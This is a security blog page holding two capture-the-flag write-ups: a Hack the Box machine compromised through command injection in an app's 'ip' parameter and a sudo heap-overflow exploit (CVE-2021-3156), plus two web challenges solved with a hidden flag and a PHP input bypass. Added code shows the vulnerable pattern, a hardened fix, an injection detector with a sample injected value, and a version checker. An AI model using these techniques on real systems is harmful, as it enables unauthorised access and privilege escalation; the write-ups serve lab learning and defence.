<p>JDMCE, a cyber security blog by John McEwan (feed: <a href="https://jdmce.com/feed.xml">https://jdmce.com/feed.xml</a>).</p>
<h1 id="routerspace-writeup">RouterSpace Writeup</h1>
<p>Published 2022-07-11, <a href="https://jdmce.com/ctf%20writeups/RouterSpace-WriteUp">https://jdmce.com/ctf%20writeups/RouterSpace-WriteUp</a></p>
<p><img src="https://jdmce.com/assets/routerspace/RouterSpace-20220711-infocard.png" alt="" /></p>
<p>RouterSpace is an easy machine on Hack the Box.</p>
<h2 id="enumeration">Enumeration</h2>
<p>nmap:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># Nmap 7.92 scan initiated Tue Jun 28 11:59:18 2022 as: nmap -sC -sV -oN scans/nmap 10.10.11.148</span>
Nmap scan report <span class="k">for </span>10.10.11.148
Host is up <span class="o">(</span>0.11s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 998 filtered tcp ports <span class="o">(</span>no-response<span class="o">)</span>
PORT STATE SERVICE VERSION
22/tcp open ssh <span class="o">(</span>protocol 2.0<span class="o">)</span>
| ssh-hostkey:
| 3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c <span class="o">(</span>RSA<span class="o">)</span>
| 256 7f:05:cd:8c:42:7b:a9:4a:b2:e6:35:2c:c4:59:78:02 <span class="o">(</span>ECDSA<span class="o">)</span>
|_ 256 2f:d7:a8:8b:be:2d:10:b0:c9:b4:29:52:a8:94:24:78 <span class="o">(</span>ED25519<span class="o">)</span>
| fingerprint-strings:
| NULL:
|_ SSH-2.0-RouterSpace Packet Filtering V1
80/tcp open http
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-title: RouterSpace
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-16039
| Content-Type: text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>utf-8
| Content-Length: 73
| ETag: W/<span class="s2">"49-IwLi6cpjw6cEfY2GCFokDC4yPXw"</span>
| Date: Tue, 28 Jun 2022 15:59:35 GMT
| Connection: close
| Suspicious activity detected <span class="o">!!!</span> <span class="o">{</span>RequestID: sGB9 cHW3 0C wYIu <span class="o">}</span>
| GetRequest:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-7090
| Accept-Ranges: bytes
| Cache-Control: public, max-age<span class="o">=</span>0
| Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
| ETag: W/<span class="s2">"652c-17d476c9285"</span>
| Content-Type: text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>UTF-8
| Content-Length: 25900
| Date: Tue, 28 Jun 2022 15:59:34 GMT
| Connection: close
| <<span class="o">!</span>doctype html>
| <html <span class="nv">class</span><span class="o">=</span><span class="s2">"no-js"</span> <span class="nv">lang</span><span class="o">=</span><span class="s2">"zxx"</span><span class="o">></span>
| <<span class="nb">head</span><span class="o">></span>
| <meta <span class="nv">charset</span><span class="o">=</span><span class="s2">"utf-8"</span><span class="o">></span>
| <meta http-equiv<span class="o">=</span><span class="s2">"x-ua-compatible"</span> <span class="nv">content</span><span class="o">=</span><span class="s2">"ie=edge"</span><span class="o">></span>
| <title>RouterSpace</title>
| <meta <span class="nv">name</span><span class="o">=</span><span class="s2">"description"</span> <span class="nv">content</span><span class="o">=</span><span class="s2">""</span><span class="o">></span>
| <meta <span class="nv">name</span><span class="o">=</span><span class="s2">"viewport"</span> <span class="nv">content</span><span class="o">=</span><span class="s2">"width=device-width, initial-scale=1"</span><span class="o">></span>
| <<span class="nb">link </span><span class="nv">rel</span><span class="o">=</span><span class="s2">"stylesheet"</span> <span class="nv">href</span><span class="o">=</span><span class="s2">"css/bootstrap.min.css"</span><span class="o">></span>
| <<span class="nb">link </span><span class="nv">rel</span><span class="o">=</span><span class="s2">"stylesheet"</span> <span class="nv">href</span><span class="o">=</span><span class="s2">"css/owl.carousel.min.css"</span><span class="o">></span>
| <<span class="nb">link </span><span class="nv">rel</span><span class="o">=</span><span class="s2">"stylesheet"</span> <span class="nv">href</span><span class="o">=</span><span class="s2">"css/magnific-popup.css"</span><span class="o">></span>
| <<span class="nb">link </span><span class="nv">rel</span><span class="o">=</span><span class="s2">"stylesheet"</span> <span class="nv">href</span><span class="o">=</span><span class="s2">"css/font-awesome.min.css"</span><span class="o">></span>
| <<span class="nb">link </span><span class="nv">rel</span><span class="o">=</span><span class="s2">"stylesheet"</span> <span class="nv">href</span><span class="o">=</span><span class="s2">"css/themify-icons.css"</span><span class="o">></span>
| HTTPOptions:
| HTTP/1.1 200 OK
| X-Powered-By: RouterSpace
| X-Cdn: RouterSpace-14069
| Allow: GET,HEAD,POST
| Content-Type: text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>utf-8
| Content-Length: 13
| ETag: W/<span class="s2">"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"</span>
| Date: Tue, 28 Jun 2022 15:59:34 GMT
| Connection: close
| GET,HEAD,POST
| RTSPRequest, X11Probe:
| HTTP/1.1 400 Bad Request
|_ Connection: close
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
<span class="o">==============</span>NEXT SERVICE FINGERPRINT <span class="o">(</span>SUBMIT INDIVIDUALLY<span class="o">)==============</span>
SF-Port22-TCP:V<span class="o">=</span>7.92%I<span class="o">=</span>7%D<span class="o">=</span>6/28%Time<span class="o">=</span>62BB2566%P<span class="o">=</span>x86_64-pc-linux-gnu%r<span class="o">(</span>NULL
SF:,29,<span class="s2">"SSH-2</span><span class="se">\.</span><span class="s2">0-RouterSpace</span><span class="se">\x</span><span class="s2">20Packet</span><span class="se">\x</span><span class="s2">20Filtering</span><span class="se">\x</span><span class="s2">20V1</span><span class="se">\r\n</span><span class="s2">"</span><span class="o">)</span><span class="p">;</span>
<span class="o">==============</span>NEXT SERVICE FINGERPRINT <span class="o">(</span>SUBMIT INDIVIDUALLY<span class="o">)==============</span>
SF-Port80-TCP:V<span class="o">=</span>7.92%I<span class="o">=</span>7%D<span class="o">=</span>6/28%Time<span class="o">=</span>62BB2566%P<span class="o">=</span>x86_64-pc-linux-gnu%r<span class="o">(</span>GetR
SF:equest,1F86,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20200</span><span class="se">\x</span><span class="s2">20OK</span><span class="se">\r\n</span><span class="s2">X-Powered-By:</span><span class="se">\x</span><span class="s2">20RouterSpace</span><span class="se">\r\n</span><span class="s2">
SF:X-Cdn:</span><span class="se">\x</span><span class="s2">20RouterSpace-7090</span><span class="se">\r\n</span><span class="s2">Accept-Ranges:</span><span class="se">\x</span><span class="s2">20bytes</span><span class="se">\r\n</span><span class="s2">Cache-Control:
SF:</span><span class="se">\x</span><span class="s2">20public,</span><span class="se">\x</span><span class="s2">20max-age=0</span><span class="se">\r\n</span><span class="s2">Last-Modified:</span><span class="se">\x</span><span class="s2">20Mon,</span><span class="se">\x</span><span class="s2">2022</span><span class="se">\x</span><span class="s2">20Nov</span><span class="se">\x</span><span class="s2">202021
SF:</span><span class="se">\x</span><span class="s2">2011:33:57</span><span class="se">\x</span><span class="s2">20GMT</span><span class="se">\r\n</span><span class="s2">ETag:</span><span class="se">\x</span><span class="s2">20W/</span><span class="se">\"</span><span class="s2">652c-17d476c9285</span><span class="se">\"\r\n</span><span class="s2">Content-Type:
SF:</span><span class="se">\x</span><span class="s2">20text/html;</span><span class="se">\x</span><span class="s2">20charset=UTF-8</span><span class="se">\r\n</span><span class="s2">Content-Length:</span><span class="se">\x</span><span class="s2">2025900</span><span class="se">\r\n</span><span class="s2">Date:</span><span class="se">\x</span><span class="s2">2
SF:0Tue,</span><span class="se">\x</span><span class="s2">2028</span><span class="se">\x</span><span class="s2">20Jun</span><span class="se">\x</span><span class="s2">202022</span><span class="se">\x</span><span class="s2">2015:59:34</span><span class="se">\x</span><span class="s2">20GMT</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">20close</span><span class="se">\r</span><span class="s2">
SF:</span><span class="se">\n\r\n</span><span class="s2"><!doctype</span><span class="se">\x</span><span class="s2">20html></span><span class="se">\n</span><span class="s2"><html</span><span class="se">\x</span><span class="s2">20class=</span><span class="se">\"</span><span class="s2">no-js</span><span class="se">\"\x</span><span class="s2">20lang=</span><span class="se">\"</span><span class="s2">zxx</span><span class="se">\"</span><span class="s2">></span><span class="se">\n</span><span class="s2"><h
SF:ead></span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20<meta</span><span class="se">\x</span><span class="s2">20charset=</span><span class="se">\"</span><span class="s2">utf-8</span><span class="se">\"</span><span class="s2">></span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20<met
SF:a</span><span class="se">\x</span><span class="s2">20http-equiv=</span><span class="se">\"</span><span class="s2">x-ua-compatible</span><span class="se">\"\x</span><span class="s2">20content=</span><span class="se">\"</span><span class="s2">ie=edge</span><span class="se">\"</span><span class="s2">></span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">
SF:20</span><span class="se">\x</span><span class="s2">20<title>RouterSpace</title></span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20<meta</span><span class="se">\x</span><span class="s2">20name=</span><span class="se">\"</span><span class="s2">descr
SF:iption</span><span class="se">\"\x</span><span class="s2">20content=</span><span class="se">\"\"</span><span class="s2">></span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20<meta</span><span class="se">\x</span><span class="s2">20name=</span><span class="se">\"</span><span class="s2">viewport</span><span class="se">\"\x</span><span class="s2">
SF:20content=</span><span class="se">\"</span><span class="s2">width=device-width,</span><span class="se">\x</span><span class="s2">20initial-scale=1</span><span class="se">\"</span><span class="s2">></span><span class="se">\n\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">
SF:20<link</span><span class="se">\x</span><span class="s2">20rel=</span><span class="se">\"</span><span class="s2">stylesheet</span><span class="se">\"\x</span><span class="s2">20href=</span><span class="se">\"</span><span class="s2">css/bootstrap</span><span class="se">\.</span><span class="s2">min</span><span class="se">\.</span><span class="s2">css</span><span class="se">\"</span><span class="s2">></span><span class="se">\n\x</span><span class="s2">2
SF:0</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20<link</span><span class="se">\x</span><span class="s2">20rel=</span><span class="se">\"</span><span class="s2">stylesheet</span><span class="se">\"\x</span><span class="s2">20href=</span><span class="se">\"</span><span class="s2">css/owl</span><span class="se">\.</span><span class="s2">carousel</span><span class="se">\.</span><span class="s2">m
SF:in</span><span class="se">\.</span><span class="s2">css</span><span class="se">\"</span><span class="s2">></span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20<link</span><span class="se">\x</span><span class="s2">20rel=</span><span class="se">\"</span><span class="s2">stylesheet</span><span class="se">\"\x</span><span class="s2">20href=</span><span class="se">\"</span><span class="s2">css/m
SF:agnific-popup</span><span class="se">\.</span><span class="s2">css</span><span class="se">\"</span><span class="s2">></span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20<link</span><span class="se">\x</span><span class="s2">20rel=</span><span class="se">\"</span><span class="s2">stylesheet</span><span class="se">\"\x</span><span class="s2">20h
SF:ref=</span><span class="se">\"</span><span class="s2">css/font-awesome</span><span class="se">\.</span><span class="s2">min</span><span class="se">\.</span><span class="s2">css</span><span class="se">\"</span><span class="s2">></span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20<link</span><span class="se">\x</span><span class="s2">20rel=</span><span class="se">\"</span><span class="s2">sty
SF:lesheet</span><span class="se">\"\x</span><span class="s2">20href=</span><span class="se">\"</span><span class="s2">css/themify-icons</span><span class="se">\.</span><span class="s2">css</span><span class="se">\"</span><span class="s2">></span><span class="se">\n\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20"</span><span class="o">)</span>%r<span class="o">(</span>HTTPOptions
SF:,108,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20200</span><span class="se">\x</span><span class="s2">20OK</span><span class="se">\r\n</span><span class="s2">X-Powered-By:</span><span class="se">\x</span><span class="s2">20RouterSpace</span><span class="se">\r\n</span><span class="s2">X-Cdn:</span><span class="se">\</span><span class="s2">
SF:x20RouterSpace-14069</span><span class="se">\r\n</span><span class="s2">Allow:</span><span class="se">\x</span><span class="s2">20GET,HEAD,POST</span><span class="se">\r\n</span><span class="s2">Content-Type:</span><span class="se">\x</span><span class="s2">20tex
SF:t/html;</span><span class="se">\x</span><span class="s2">20charset=utf-8</span><span class="se">\r\n</span><span class="s2">Content-Length:</span><span class="se">\x</span><span class="s2">2013</span><span class="se">\r\n</span><span class="s2">ETag:</span><span class="se">\x</span><span class="s2">20W/</span><span class="se">\"</span><span class="s2">d-bMe
SF:dpZYGrVt1nR4x</span><span class="se">\+</span><span class="s2">qdNZ2GqyRo</span><span class="se">\"\r\n</span><span class="s2">Date:</span><span class="se">\x</span><span class="s2">20Tue,</span><span class="se">\x</span><span class="s2">2028</span><span class="se">\x</span><span class="s2">20Jun</span><span class="se">\x</span><span class="s2">202022</span><span class="se">\x</span><span class="s2">2015
SF::59:34</span><span class="se">\x</span><span class="s2">20GMT</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">20close</span><span class="se">\r\n\r\n</span><span class="s2">GET,HEAD,POST"</span><span class="o">)</span>%r<span class="o">(</span>RTSPRequ
SF:est,2F,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Request</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">20close</span><span class="se">\r\n\</span><span class="s2">
SF:r</span><span class="se">\n</span><span class="s2">"</span><span class="o">)</span>%r<span class="o">(</span>X11Probe,2F,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20400</span><span class="se">\x</span><span class="s2">20Bad</span><span class="se">\x</span><span class="s2">20Request</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\</span><span class="s2">
SF:x20close</span><span class="se">\r\n\r\n</span><span class="s2">"</span><span class="o">)</span>%r<span class="o">(</span>FourOhFourRequest,12F,<span class="s2">"HTTP/1</span><span class="se">\.</span><span class="s2">1</span><span class="se">\x</span><span class="s2">20200</span><span class="se">\x</span><span class="s2">20OK</span><span class="se">\r\n</span><span class="s2">X
SF:-Powered-By:</span><span class="se">\x</span><span class="s2">20RouterSpace</span><span class="se">\r\n</span><span class="s2">X-Cdn:</span><span class="se">\x</span><span class="s2">20RouterSpace-16039</span><span class="se">\r\n</span><span class="s2">Content-T
SF:ype:</span><span class="se">\x</span><span class="s2">20text/html;</span><span class="se">\x</span><span class="s2">20charset=utf-8</span><span class="se">\r\n</span><span class="s2">Content-Length:</span><span class="se">\x</span><span class="s2">2073</span><span class="se">\r\n</span><span class="s2">ETag:</span><span class="se">\x</span><span class="s2">
SF:20W/</span><span class="se">\"</span><span class="s2">49-IwLi6cpjw6cEfY2GCFokDC4yPXw</span><span class="se">\"\r\n</span><span class="s2">Date:</span><span class="se">\x</span><span class="s2">20Tue,</span><span class="se">\x</span><span class="s2">2028</span><span class="se">\x</span><span class="s2">20Jun</span><span class="se">\x</span><span class="s2">2
SF:02022</span><span class="se">\x</span><span class="s2">2015:59:35</span><span class="se">\x</span><span class="s2">20GMT</span><span class="se">\r\n</span><span class="s2">Connection:</span><span class="se">\x</span><span class="s2">20close</span><span class="se">\r\n\r\n</span><span class="s2">Suspicious</span><span class="se">\x</span><span class="s2">20a
SF:ctivity</span><span class="se">\x</span><span class="s2">20detected</span><span class="se">\x</span><span class="s2">20!!!</span><span class="se">\x</span><span class="s2">20{RequestID:</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20sGB9</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20cHW3</span><span class="se">\x</span><span class="s2">200C
SF:</span><span class="se">\x</span><span class="s2">20</span><span class="se">\x</span><span class="s2">20wYIu</span><span class="se">\x</span><span class="s2">20}</span><span class="se">\n\n\n\n\n\n</span><span class="s2">"</span><span class="o">)</span><span class="p">;</span>
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
<span class="c"># Nmap done at Tue Jun 28 11:59:49 2022 -- 1 IP address (1 host up) scanned in 31.13 seconds</span>
</code></pre></div></div>
<p>There is a website running on port 80. There isn't much on the site other than a download link.</p>
<p><img src="https://jdmce.com/assets/routerspace/RouterSpace-20220711-website.png" alt="" /></p>
<p>The download is an apk file, RouterSpace.apk.</p>
<p>I tried running some tools on the APK but couldn't find anything interesting.</p>
<p>To run the APK I use Genymotion, an Android emulator.</p>
<h2 id="exploit">Exploit</h2>
<p>I install the APK in the emulated Android device. I can then intercept the app's HTTP requests with Burp: in Android, set the Wi-Fi connection's proxy to Manual and point it at Burp, and change Burp's proxy listener to bind to an interface the emulator can reach.</p>
<p>The app has only one button, “Check Status”.</p>
<p><img src="https://jdmce.com/assets/routerspace/RouterSpace-20220711-app.png" alt="" /></p>
<p>Clicking this button sends the following HTTP request:</p>
<p><img src="https://jdmce.com/assets/routerspace/RouterSpace-20220711-app-request.png" alt="" /></p>
<p>I send the request to Burp Repeater and start to mess with different inputs.</p>
<p>The “ip” parameter is vulnerable to command injection.</p>
<p><img src="https://jdmce.com/assets/routerspace/RouterSpace-20220711-app-command-injection.png" alt="" /></p>
<p>I generate an SSH key pair and use the command injection to add the public key to paul's <code class="language-plaintext highlighter-rouge">authorized_keys</code> file. I can then connect via SSH.</p>
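<p>The write-up only shows the injection from the attacker's side. The following is an added example, not code from the write-up or from the RouterSpace box: it shows the handler pattern that makes an "ip" parameter reach a shell, the hardened form of the same handler, and a small check you can run over web-server logs to spot metacharacters in that parameter. The endpoint name, the ping command, the log format and the sample log lines are constructed for illustration; only the parameter name "ip" comes from the write-up.</p>

```python
"""Added example, not code from the RouterSpace write-up or the box itself.

The write-up found that the app's "ip" parameter reaches a shell. This file
shows the pattern that makes that possible, the hardened form, and a small
check for request logs. The endpoint name, the ping command and the log
lines below are constructed for illustration.
"""
import ipaddress
import re
import subprocess
from urllib.parse import unquote_plus

# Characters that let a value escape a shell word: command separators,
# pipes, redirection, substitution, quoting and line breaks.
SHELL_META = re.compile(r"[;&|`$<>(){}\\\n\r'\"]")


def vulnerable_command_line(ip: str) -> str:
    """The bug: the parameter is spliced into a string that a handler then
    runs with subprocess.run(cmd, shell=True). Anything after ';' or '|' in
    ip becomes a second command. Returned rather than executed so the
    resulting string can be inspected safely."""
    return f"ping -c 1 {ip}"


def is_valid_target(ip: str) -> bool:
    """True only when the value parses as a literal IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(ip.strip())
    except ValueError:
        return False
    return True


def hardened_command(ip: str) -> list:
    """Fix: parse the value as an IP address (anything else is rejected) and
    pass it as one argv element with no shell in between, so metacharacters
    are never interpreted by anything."""
    if not is_valid_target(ip):
        raise ValueError(f"not an IP address: {ip!r}")
    return ["ping", "-c", "1", str(ipaddress.ip_address(ip.strip()))]


def check_status(ip: str) -> bool:
    """Runs the hardened command and reports whether the host answered."""
    result = subprocess.run(hardened_command(ip), capture_output=True, check=False)
    return result.returncode == 0


def looks_injected(value: str) -> bool:
    """True when a submitted value carries shell metacharacters."""
    return SHELL_META.search(value) is not None


def flag_suspicious_requests(log_lines):
    """Returns the log lines whose ip= query parameter contains shell
    metacharacters after URL-decoding. The log format is an assumption."""
    hits = []
    for line in log_lines:
        m = re.search(r'[?&]ip=([^&\s"]*)', line)
        if m and looks_injected(unquote_plus(m.group(1))):
            hits.append(line)
    return hits


# Constructed sample log lines; the second one carries an injection attempt.
SAMPLE_LOG = [
    '10.10.14.7 - - [28/Jun/2022:15:59:35 +0000] "GET /check-status?ip=10.10.11.148 HTTP/1.1" 200 73',
    '10.10.14.7 - - [28/Jun/2022:15:59:41 +0000] "GET /check-status?ip=10.10.11.148%3B+id HTTP/1.1" 200 120',
]

if __name__ == "__main__":
    print(vulnerable_command_line("10.10.11.148; id"))
    print(hardened_command("10.10.11.148"))
    for line in flag_suspicious_requests(SAMPLE_LOG):
        print("suspicious:", line)
```

<p>The important design choice is that the hardened handler does not try to escape the input; it rejects anything that is not an IP address and never hands a string to a shell at all. Escaping is what people reach for first, and it is where the next bypass lives.</p>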
<h2 id="priv-esc">Priv Esc</h2>
<p>Running linpeas.sh suggests that the machine is vulnerable to <code class="language-plaintext highlighter-rouge">CVE-2021-3156</code>. This is the recent sudoedit heap-overflow vulnerability (Baron Samedit); a video explanation is at <a href="https://www.youtube.com/watch?v=TLa2VqcGGEQ">https://www.youtube.com/watch?v=TLa2VqcGGEQ</a>.</p>
<p><a href="https://github.com/CptGibbon/CVE-2021-3156">github.com/CptGibbon/CVE-2021-3156</a></p>
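<p>linpeas only flags a version number, so it is worth knowing what it is matching on. The following is an added example, not code from the write-up, linpeas or the exploit repo: a version check for CVE-2021-3156 that can be run against the first line of <code class="language-plaintext highlighter-rouge">sudo --version</code>. The affected ranges (legacy 1.8.2 through 1.8.31p2, stable 1.9.0 through 1.9.5p1, fixed in 1.9.5p2) are from the sudo advisory; the function names and the version parsing are mine.</p>

```python
"""Added example, not code from the write-up or the exploit repo.

Checks a sudo version string against the ranges affected by CVE-2021-3156
(sudo advisory: legacy 1.8.2..1.8.31p2 and stable 1.9.0..1.9.5p1, fixed in
1.9.5p2). Function names and parsing are this example's own.
"""
import re
import subprocess

# Matches "1.8.31p2", "1.9.5" or "1.9.5p1" anywhere in a line such as
# "Sudo version 1.8.31". The ".patch" and "pN" parts are optional.
VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:p(\d+))?")

AFFECTED_RANGES = (
    ((1, 8, 2, 0), (1, 8, 31, 2)),   # legacy branch
    ((1, 9, 0, 0), (1, 9, 5, 1)),    # stable branch
)


def parse_sudo_version(text: str) -> tuple:
    """Turns a version string (or the first line of `sudo --version`) into a
    comparable (major, minor, patch, p) tuple; missing parts become 0."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no sudo version found in {text!r}")
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch or 0), int(p or 0))


def vulnerable_to_cve_2021_3156(version: str) -> bool:
    """True when the upstream version number falls in an affected range."""
    v = parse_sudo_version(version)
    return any(low <= v <= high for low, high in AFFECTED_RANGES)


def local_sudo_version() -> str:
    """First line of `sudo --version` on this host ('' if sudo is absent)."""
    try:
        out = subprocess.run(["sudo", "--version"], capture_output=True,
                             text=True, check=False).stdout
    except FileNotFoundError:
        return ""
    return out.splitlines()[0] if out else ""


if __name__ == "__main__":
    line = local_sudo_version()
    if line:
        print(line, "->", "affected range" if vulnerable_to_cve_2021_3156(line)
              else "outside affected range")
```

<p>Treat a match as a reason to look further, not a verdict: distributions usually backport the fix without bumping the upstream version number, so a patched package can still report a version inside the affected range. The package changelog settles it.</p>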
<p>I copy the contents of this repo to the machine using scp.</p>
<p>Following the steps in the repo we get root!</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>paul@routerspace:/dev/shm/CVE-2021-3156<span class="nv">$ </span>./exploit
<span class="c"># id </span>
<span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span>,1001<span class="o">(</span>paul<span class="o">)</span>
</code></pre></div></div>
<hr />
<h1 id="le-tour-de-hack-2021-ctf-writeup">Le Tour De Hack 2021 CTF WriteUp</h1>
<p>Published 2021-06-21 by John McEwan, <a href="https://jdmce.com/ctf%20writeups/Le-Tour-De-Hack-21-Writeup">https://jdmce.com/ctf%20writeups/Le-Tour-De-Hack-21-Writeup</a></p>
<p><img src="https://jdmce.com/assets/ltdh21/ltdh21.jpg" alt="Le Tour De Hack" /></p>
<p><a href="https://ltdh21.enusec.org/">Le Tour De Hack</a> was an online CTF event organised by <a href="https://enusec.org/">ENUSEC</a>, the Edinburgh Napier Security Society.</p>
<p>This write-up will cover the challenges I solved during the event.</p>
<h2 id="web">Web</h2>
<h3 id="redacted">Redacted</h3>
<ul>
<li>Description: You can’t see me therefore I must be hidden!</li>
<li>Solves: 32</li>
</ul>
<p>This was a simple challenge. We are given a webpage on which the flag is “redacted”. Viewing the page source reveals the flag: it is drawn as SVG text with a black rectangle placed on top of it.</p>
<div class="language-html highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nt"><html></span>
<span class="nt"><style></span>
<span class="nt">h1</span><span class="p">{</span>
<span class="nl">text-align</span><span class="p">:</span> <span class="nb">center</span><span class="p">;</span>
<span class="p">}</span>
<span class="nt"></style></span>
<span class="nt"><h1></span>Classified<span class="nt"></h1></span>
<span class="nt"><a></span>
<span class="nt"></a></span>
<span class="nt"><svg</span> <span class="na">width=</span><span class="s">"500"</span> <span class="na">height=</span><span class="s">"500"</span><span class="nt">></span>
<span class="nt"><text</span> <span class="na">x=</span><span class="s">"0"</span> <span class="na">y=</span><span class="s">"15"</span> <span class="na">fill=</span><span class="s">"black"</span><span class="nt">></span>THE FLAG IS<span class="nt"></text></span>
<span class="nt"><text</span> <span class="na">x=</span><span class="s">"100"</span> <span class="na">y=</span><span class="s">"15"</span> <span class="na">fill=</span><span class="s">"black"</span><span class="nt">></span>ltdh21{The_Truth_Is_Out_There}<span class="nt"></text></span>
<span class="nt"><rect</span> <span class="na">width=</span><span class="s">"300"</span> <span class="na">height=</span><span class="s">"20"</span> <span class="na">style=</span><span class="s">"fill:rgb(0,0,0);stroke-width:3;stroke:rgb(0,0,0)"</span> <span class="na">x=</span><span class="s">"100"</span> <span class="na">y=</span><span class="s">"0"</span> <span class="nt">/></span>
<span class="nt"></svg></span>
<span class="nt"></html></span>
</code></pre></div></div>
<hr />
<h3 id="php-trickery">PHP Trickery</h3>
<ul>
<li>Description: Daaaamn PHP, Back at it again with the crazy logic.</li>
<li>Solves: 12</li>
</ul>
<p>When the webpage loads it returns the message “Fail”. The source code contains the comment <code class="language-plaintext highlighter-rouge"><!-- ?source --></code>.
Adding the source parameter reveals the PHP source code.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://trickery.enusec.org/index.php?source=
</code></pre></div></div>
<div class="language-php highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp"><?php</span>
<span class="k">include</span><span class="p">(</span><span class="s2">"flag.php"</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s2">"source"</span><span class="p">])){</span>
<span class="nb">highlight_file</span><span class="p">(</span><span class="k">__FILE__</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">function</span> <span class="n">inverse</span><span class="p">(</span><span class="nv">$x</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="mi">1</span><span class="o">/</span><span class="nv">$x</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span><span class="p">(</span><span class="k">isset</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s2">"_"</span><span class="p">])){</span>
<span class="k">if</span><span class="p">(</span><span class="nb">strlen</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s2">"_"</span><span class="p">])</span> <span class="o"><</span> <span class="mi">8</span><span class="p">){</span>
<span class="k">if</span><span class="p">(</span><span class="nf">inverse</span><span class="p">(</span><span class="nv">$_GET</span><span class="p">[</span><span class="s2">"_"</span><span class="p">])</span> <span class="o"><</span> <span class="o">-</span><span class="mi">50000000</span><span class="p">)</span> <span class="p">{</span>
<span class="k">die</span><span class="p">(</span><span class="nv">$flag</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">echo</span><span class="p">(</span><span class="s2">"Fail"</span><span class="p">);</span>
<span class="cp">?></span>
</code></pre></div></div>
<p>We can see that to reveal $flag we need to pass the _ parameter a value that is less than 8 characters long and whose inverse (1/x) is smaller than -50000000, i.e. a negative number very close to zero. I first tried using hex, but we need to pass a negative number and the strlen() check would count the 0x part of something like 0x0000, so hex won't work.</p>
<p>To provide a small enough negative number within the length limit we can use scientific notation. The number <code class="language-plaintext highlighter-rouge">-1e-9</code> is five characters and its inverse is -1e9, so it passes both tests.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://trickery.enusec.org/index.php?_=-1e-9
ltdh21{WhAts_B1gg3r_INF_or_Negative_INF}
</code></pre></div></div>
<hr />
